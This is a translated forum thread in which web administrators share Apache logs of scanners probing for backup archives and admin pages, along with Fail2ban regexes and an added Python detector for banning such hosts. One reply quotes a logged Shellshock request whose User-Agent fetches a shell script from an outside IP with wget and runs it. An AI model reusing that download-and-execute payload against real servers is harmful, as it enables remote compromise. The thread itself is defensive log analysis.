Apache logs show entries like these every day; do these people actually ever get anything out of it?

2014-12-15 09:09:19 +08:00
s2555
[Sun Dec 14 12:26:04 2014] [error] [client 123.130.10.242] File does not exist: D:/vhost/xxxxx/www.rar
[Sun Dec 14 12:26:05 2014] [error] [client 123.130.10.242] File does not exist: D:/vhost/xxxxx/www.zip
[Sun Dec 14 12:26:05 2014] [error] [client 123.130.10.242] File does not exist: D:/vhost/xxxxx/web.rar
[Sun Dec 14 12:26:06 2014] [error] [client 123.130.10.242] File does not exist: D:/vhost/xxxxx/web.zip
[Sun Dec 14 12:26:07 2014] [error] [client 123.130.10.242] File does not exist: D:/vhost/xxxxx/xxxxx.com.rar
[Sun Dec 14 12:26:07 2014] [error] [client 123.130.10.242] File does not exist: D:/vhost/xxxxx/xxxxx.com.zip
[Sun Dec 14 12:26:07 2014] [error] [client 123.130.10.242] File does not exist: D:/vhost/xxxxx/xxxxx_com.rar
[Sun Dec 14 12:26:07 2014] [error] [client 123.130.10.242] File does not exist: D:/vhost/xxxxx/xxxxx_com.zip
[Sun Dec 14 12:26:07 2014] [error] [client 123.130.10.242] File does not exist: D:/vhost/xxxxx/xxxxxcom.rar
[Sun Dec 14 12:26:07 2014] [error] [client 123.130.10.242] File does not exist: D:/vhost/xxxxx/xxxxxcom.zip
[Sun Dec 14 12:26:09 2014] [error] [client 123.130.10.242] File does not exist: D:/vhost/xxxxx/xxxxx.com.rar
[Sun Dec 14 12:26:09 2014] [error] [client 123.130.10.242] File does not exist: D:/vhost/xxxxx/xxxxx.com.zip
[Sun Dec 14 12:26:10 2014] [error] [client 123.130.10.242] File does not exist: D:/vhost/xxxxx/xxxxx.rar
[Sun Dec 14 12:26:10 2014] [error] [client 123.130.10.242] File does not exist: D:/vhost/xxxxx/xxxxx.zip
3787 clicks
Node: Questions & Answers
14 replies
TangMonk
2014-12-15 09:32:32 +08:00
What is this for, downloading your site's source code?
qq446015875
2014-12-15 09:35:16 +08:00
I get attempts every day on
/phpmyadmin
/admin
/sql
In short, all kinds of scanning...
xidianlz
2014-12-15 09:39:11 +08:00
Actually, you could collect what other people scan you for, and then you'd have a list for scanning others~ they've already sorted it out for you~
x86
2014-12-15 09:40:03 +08:00
Something like 挖掘鸡: batch scanning for weak passwords / directories / backup files.
s2555
2014-12-15 09:46:00 +08:00
I'm wondering whether I should create files like these and put some "goodies" in them for him to download.
loveyu
2014-12-15 11:19:04 +08:00
I just had a look too; similar ones include
112.242.27.228 "GET /db.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /db.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /wz.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /wz.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /fdsa.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /fdsa.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /wangzhan.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /wangzhan.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /root.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /root.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /admin.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /admin.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /data.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /gg.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /vip.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /flashfxp.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /flashfxp.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /%E6%96%B0%E5%BB%BA%E6%96%87%E4%BB%B6%E5%A4%B9.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /%E6%96%B0%E5%BB%BA%E6%96%87%E4%BB%B6%E5%A4%B9.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /01.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /01.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /02.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /02.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /03.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /03.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /04.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /04.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /05.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /05.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /06.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /06.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /09.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /09.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /10.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /10.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /1.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /1.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /2.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /2.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /3.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /3.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /4.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /4.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /5.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /5.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /6.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /6.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /7.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /7.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /8.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /8.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /9.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /9.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /11.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /11.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /12.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /12.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /20.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /20.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /22.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /22.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /33.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /33.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /44.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /44.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /55.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /55.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /66.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /66.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /77.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /77.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /88.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /88.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /99.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /99.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /00.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /aa.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /abc.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /aa.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /abc.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /123.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /123.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /1234.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /1234.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /111.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /111.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /1111.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /1111.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /888.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /888.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /222.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /222.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /333.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /333.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /444.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /444.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /555.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /555.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /666.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /666.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /777.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /777.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /888.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /888.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /999.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /999.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /000.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /000.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /web123.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /web123.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /webbak.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /webbak.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /wwwrootbak.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /wwwrootbak.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /wwwroot11.rr HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /wwwroot11.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /web2.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /web2.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /hushua.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /hushua.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /hsw.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /hsw.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /wwwroot1.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /wwwroot1.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /web1.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /web1.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /www1.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /www1.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /%E6%95%B0%E6%8D%AE%E5%BA%93.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /%E6%95%B0%E6%8D%AE%E5%BA%93.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /%E5%88%B7%E4%BF%A1%E8%AA%89.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /%E5%88%B7%E4%BF%A1%E8%AA%89.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /%E5%88%B7%E9%92%BB.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /%E5%88%B7%E9%92%BB.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /sql.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /sql.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /bak.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /bak.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /wwwroot.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /wwwroot.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /HYTop.mdb HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /www.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /www.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /web.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /web.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /beifen.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /beifen.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /2012.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /2012.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /2013.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /2013.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /shua.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /shua.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /sxy.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /sxy.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /shuazuan.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /shuazuan.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /s.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /s.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /q.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /q.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /w.rar HTTP/1.1" 404 5838 "-" "-" -
bellchu
2014-12-15 11:21:11 +08:00
I just wrote Fail2ban rules to block IPs like this; jail them for a day.
y051313
2014-12-15 13:21:10 +08:00
@bellchu Is the blocking automatic? Would you mind sharing it?
bellchu
2014-12-15 14:03:58 +08:00
@y051313 I'll just paste someone else's anti-probing regex. Make a few tweaks yourself to suit your situation: delete the services you don't have and it's done. In your case, keeping just a few rar/zip patterns is enough.


failregex = [[]client <HOST>[]] (File does not exist|script not found or unable to stat): .*/(cgi-bin|admin|Admin|sql|mail|phpmyadmin|file:|php|pma|web|PMA|PMA2006|pma2006|sqlmanager|mysqlmanager|PMA2005|phpmyadmin-old|phpmyadminold|pma2005|phpmanager|mysql|myadmin|webadmin|sqlweb|websql|webdb|mysqladmin|mysql-admin|phpmyadmin2|phpMyAdmin2|phpMyAdmin-2|php-my-admin|cms|clan|site|seite|page|forum|wbb2|board|wbb|archive|forumv2|forumv1|b0ard|f0rum|wbb1|wbb3|wbblite|directforum|board23|board2|board3|WBB|WBB2|html|phpkit|page|phpkit_1.6.1|clan|myadmin|webadmin|sqlweb|websql|webdb|mysqladmin|mysql-admin|phpmyadmin2|php-my-admin|phpMyAdmin-2.2.3|phpMyAdmin-2.2.6|phpMyAdmin-2.5.1|phpMyAdmin-2.5.4|phpMyAdmin-2.5.6|phpMyAdmin-2.6.0|phpMyAdmin-2.6.0-pl1|phpMyAdmin-2.6.2-rc1|phpMyAdmin-2.6.3|phpMyAdmin-2.6.3-pl1|phpMyAdmin-2.6.3-rc1|padmin|datenbank|ZenCart|cart|commerce|e-commerce|shop|stories|store|zc|dbadmin|typo3|database|horde|horde2|horde3|horde-3.0.9|Horde|README|horde-3.0.9|adserver|phpAdsNew|phpadsnew|phpads|Ads|ads|xmlrpc|xmlsrv|blog|drupal|community|blogs|blogtest|appserver|roundcube|rc|mail|mail2|roundcubemail|rms|webmail2|webmail|wm|bin|roundcubemail-0.1|roundcubemail-0.2|roundcube-0.1|roundcube-0.2|roun|cube|wp-login.php|ucp.php|\.asp|\.dll|\.exe|\.pl)
bellchu
2014-12-15 14:06:01 +08:00
bellchu
2014-12-15 14:08:38 +08:00
@y051313

[Definition]
failregex = (?P<host>[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}) .+ 404 [0-9]+ "
ignoreregex = favicon\.ico

In fail2ban's jail.conf, set the retry count for the web service a bit higher, say 5 to 10, to avoid false bans; but unless it's a download site, 404s basically won't cause false bans.
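A worked version of the approach bellchu describes, added here as an example and not code from the thread or from fail2ban itself: Python detection logic that applies the two filter ideas posted above (the error_log "File does not exist" match and the access_log 404 match), narrows to the rar/zip feature as suggested for this case, honours the favicon ignore rule, and applies a maxretry threshold inside a findtime window the way a fail2ban jail does. The sample log lines are constructed to mirror the formats pasted in this thread; the `maxretry` and `findtime` defaults are assumptions, not values from the page.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Added example: a fail2ban-style detector for backup-archive probing.
# Log lines below are constructed to match the two formats posted in the
# thread (Apache error_log and access_log); the thresholds are assumptions.

# Error-log lines like the opening post, mirroring bellchu's first filter.
ERROR_RE = re.compile(
    r"^\[(?P<ts>[A-Z][a-z]{2} [A-Z][a-z]{2} +\d{1,2} \d{2}:\d{2}:\d{2} \d{4})\] \[error\] "
    r"\[client (?P<host>\d{1,3}(?:\.\d{1,3}){3})\] "
    r"(?:File does not exist|script not found or unable to stat): (?P<path>\S+)$"
)

# Access-log lines, with or without the "- - [timestamp]" fields, keyed on
# "<host> ... 404 <bytes>" like bellchu's second filter.
ACCESS_RE = re.compile(
    r"^(?P<host>\d{1,3}(?:\.\d{1,3}){3}) (?:\S+ \S+ \[(?P<ts>[^\]]+)\] )?"
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \d+'
)

BACKUP_PROBE_RE = re.compile(r"\.(?:rar|zip)$", re.IGNORECASE)  # the rar/zip feature
IGNORE_RE = re.compile(r"favicon\.ico")  # bellchu's ignoreregex


def parse_line(line):
    """Return (host, path, timestamp-or-None) for a missing-file hit, else None."""
    m = ERROR_RE.match(line)
    if m:
        ts = datetime.strptime(m["ts"], "%a %b %d %H:%M:%S %Y")
    else:
        m = ACCESS_RE.match(line)
        if not m or m["status"] != "404":
            return None
        # Windows are compared per host, so a naive local clock is enough here.
        ts = (datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z").replace(tzinfo=None)
              if m["ts"] else None)
    if IGNORE_RE.search(m["path"]):
        return None
    return m["host"], m["path"], ts


def find_offenders(lines, maxretry=5, findtime=timedelta(minutes=10), only_archives=True):
    """Hosts whose missing-file hits reach maxretry within any findtime window.

    Returns {host: peak hits in one window}. Lines with no timestamp (the
    trimmed access-log format) are counted as a single batch.
    """
    hits = defaultdict(list)
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        host, path, ts = parsed
        if only_archives and not BACKUP_PROBE_RE.search(path):
            continue
        hits[host].append(ts)

    offenders = {}
    for host, stamps in hits.items():
        if any(ts is None for ts in stamps):
            peak = len(stamps)
        else:
            window, peak = deque(), 0
            for ts in sorted(stamps):  # sliding window, oldest hit dropped first
                window.append(ts)
                while ts - window[0] > findtime:
                    window.popleft()
                peak = max(peak, len(window))
        if peak >= maxretry:
            offenders[host] = peak
    return offenders


# Constructed sample: one archive-probing burst in error_log format, two
# benign 404s, a trimmed access_log burst, one 200, and one combined-format 404.
SAMPLE_LOG = """\
[Sun Dec 14 12:26:04 2014] [error] [client 123.130.10.242] File does not exist: D:/vhost/example/www.rar
[Sun Dec 14 12:26:05 2014] [error] [client 123.130.10.242] File does not exist: D:/vhost/example/www.zip
[Sun Dec 14 12:26:05 2014] [error] [client 123.130.10.242] File does not exist: D:/vhost/example/web.rar
[Sun Dec 14 12:26:06 2014] [error] [client 123.130.10.242] File does not exist: D:/vhost/example/web.zip
[Sun Dec 14 12:26:07 2014] [error] [client 123.130.10.242] File does not exist: D:/vhost/example/example.com.rar
[Sun Dec 14 12:26:07 2014] [error] [client 123.130.10.242] File does not exist: D:/vhost/example/example.com.zip
[Sun Dec 14 12:30:00 2014] [error] [client 198.51.100.7] File does not exist: D:/vhost/example/favicon.ico
[Sun Dec 14 12:31:00 2014] [error] [client 198.51.100.7] File does not exist: D:/vhost/example/old-page.html
112.242.27.228 "GET /db.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /db.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /wwwroot.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /wwwroot.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /bak.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /index.html HTTP/1.1" 200 1234 "-" "-" -
76.119.182.53 - - [08/Dec/2014:04:47:44 -0500] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 177 "-" "-"
""".splitlines()

if __name__ == "__main__":
    for host, peak in find_offenders(SAMPLE_LOG).items():
        print(f"ban candidate {host}: {peak} archive probes in one window")
```

The `only_archives=False` path is bellchu's broader "any 404" rule; with `maxretry` raised to 5 to 10, a genuine visitor who follows one dead link never reaches the threshold, while a scanner walking a backup-file wordlist hits it within seconds. The same three knobs map directly onto a jail's `maxretry`, `findtime` and `bantime`.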
y051313
2014-12-15 15:31:03 +08:00
@bellchu Thanks a lot!
clino
2014-12-15 15:41:14 +08:00
Besides the ones above, I also see this one show up very frequently:

76.119.182.53 - - [08/Dec/2014:04:47:44 -0500] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 177 "-" "() { :; }; /bin/rm -rf /tmp/S0.sh && /bin/mkdir -p /share/HDB_DATA/.../php && /usr/bin/wget -c http://185.14.30.79/S0.sh -P /tmp && /bin/sh /tmp/S0.sh 0<&1 2>&1"
20150517
2014-12-16 16:27:19 +08:00
Give him an archive to download, put an html file in it, say admin_passwd.html, with a 1px img linking back to your site, and you can see who is bored enough to be scanning.

https://www.v2ex.com/t/153945